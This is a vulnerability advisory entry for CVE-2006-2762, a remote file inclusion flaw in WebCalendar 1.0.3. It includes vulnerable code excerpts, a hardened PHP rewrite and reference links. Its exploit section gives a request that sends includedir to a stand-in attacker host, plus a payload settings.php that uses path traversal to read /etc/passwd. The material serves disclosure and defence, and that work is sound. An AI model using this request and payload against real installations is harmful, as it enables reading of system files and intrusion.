WebCalendar config.php PHP Remote File Inclusion Vulnerability

Vulnerability ID: 1194751    Vulnerability type: input validation
Published: 2006-05-31    Updated: 2006-06-13
CVE ID: CVE-2006-2762    CNNVD ID: CNNVD-200606-041
Platform: N/A    CVSS score: 6.4
|Vulnerability sources
https://www.securityfocus.com/bid/18175
https://cxsecurity.com/issue/WLB-2006060025
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200606-041
|Vulnerability details
A PHP remote file inclusion vulnerability exists in includes/config.php in WebCalendar 1.0.3. A remote attacker can execute arbitrary PHP code via a URL supplied in the includedir parameter: the URL is opened remotely by an fopen call, the contents returned by that call are used to define the user_inc setting, and user_inc is then passed to an include_once call.
|Vulnerability EXP
Version:    WebCalendar-1.0.3
Type:       Reading of any files

Description:
-----------------------------
includes/config.php:
line  64

if ( ! empty ( $includedir ) )
$fd = @fopen ( "$includedir/settings.php", "rb", true );
......
while ( ! feof ( $fd ) ) {
$data .= fgets ( $fd, 4096 );
}
$configLines = explode ( "\n", $data );
for ( $n = 0; $n < count ( $configLines ); $n++ ) {
......
$settings[$matches[1]] = $matches[2];
......
$user_inc = $settings['user_inc'];
......

includes/init.php
include_once "includes/$user_inc";

Example:
---------------------------------------
index.php?includedir=http://attacker_host

where on attacker_host there is a file settings.php with the following content:
"
<?php
echo '<?php
# updated via install/index.php on Wed, 24 May 2006 09:29:55 +0300
Unimportant variables can be taken from original settings.php
user_inc: ../../../../../../../../../../../../../../../../etc/passwd
# end settings.php
?>';
?>
"

Requirements
register_globals = On;
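The flow above has three weak points: $includedir is taken from the request (register_globals), fopen() follows URL wrappers, and user_inc is passed to include_once unchecked. The following is an added illustration of a hardened version of that settings-loading step; it is not WebCalendar's own code, and the function names, the settings.php line format and the allow-list of user_inc files are assumptions made for the example.

```php
<?php
// Added example, not code from WebCalendar. Demonstrates the three fixes:
// 1) the include directory is never read from the request,
// 2) URL/stream wrappers and directory traversal are refused,
// 3) user_inc is reduced to a file name from a fixed allow-list.

// Only accept an include directory that resolves inside $appRoot.
// Rejects "http://", "ftp://", "php://" and "../" escapes.
function safe_include_dir(string $includedir, string $appRoot): ?string {
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $includedir)) {
        return null;                      // remote or stream wrapper
    }
    $real = realpath($appRoot . '/' . $includedir);
    $root = realpath($appRoot);
    if ($real === false || $root === false) {
        return null;
    }
    if ($real !== $root && strpos($real, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;                      // resolved outside the app root
    }
    return $real;
}

// Parse "key: value" lines from a local settings.php (assumed format).
function load_settings(string $path): array {
    $settings = [];
    foreach (explode("\n", (string) @file_get_contents($path)) as $line) {
        if (preg_match('/^\s*([A-Za-z_][A-Za-z0-9_]*)\s*:\s*(.*)$/', $line, $m)) {
            $settings[$m[1]] = trim($m[2]);
        }
    }
    return $settings;
}

// user_inc must be a bare file name on the allow-list, never a path.
function safe_user_inc(array $settings): string {
    $allowed = ['user.php', 'user-ldap.php'];   // assumed allow-list
    $name = basename($settings['user_inc'] ?? 'user.php');
    return in_array($name, $allowed, true) ? $name : 'user.php';
}

// Resolve the file init.php should include; $includedir is a constant
// chosen by the deployment, not a request variable.
function user_inc_path(string $appRoot, string $includedir = 'includes'): string {
    $dir = safe_include_dir($includedir, $appRoot) ?? $appRoot . '/includes';
    $settings = load_settings($dir . '/settings.php');
    return $appRoot . '/includes/' . safe_user_inc($settings);
}
```

With this shape, a settings.php line such as the traversal payload shown in the EXP section collapses to basename('passwd'), which is not on the allow-list and falls back to the default include.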
|Affected products
k5n WebCalendar 1.0.3
k5n WebCalendar 1.0.2
k5n WebCalendar 1.0.1
k5n WebCalendar 1.0 RC3
k5n WebCalendar 1.0 rc2
k5n WebCalendar 1.0 RC1
k5n WebCalendar 1.
|References

Source: VUPEN
Name: ADV-2006-2067
Link: http://www.frsirt.com/english/advisories/2006/2067
Source: SECTRACK
Name: 1016179
Link: http://securitytracker.com/id?1016179
Source: SECUNIA
Name: 20367
Link: http://secunia.com/advisories/20367
Source: BID
Name: 18175
Link: http://www.securityfocus.com/bid/18175
Source: BUGTRAQ
Name: 20060607 Re: WebCalendar-1.0.3 reading of any files
Link: http://www.securityfocus.com/archive/1/archive/1/436263/100/0/threaded
Source: BUGTRAQ
Name: 20060530 WebCalendar-1.0.3 reading of any files
Link: http://www.securityfocus.com/archive/1/435379
Source: OSVDB
Name: 25842
Link: http://www.osvdb.org/25842
Source: DEBIAN
Name: DSA-1096
Link: http://www.debian.org/security/2006/dsa-1096
Source: SREASON
Name: 1019
Link: http://securityreason.com/securityalert/1019
Source: SECUNIA
Name: 20542
Link: http://secunia.com/advisories/20542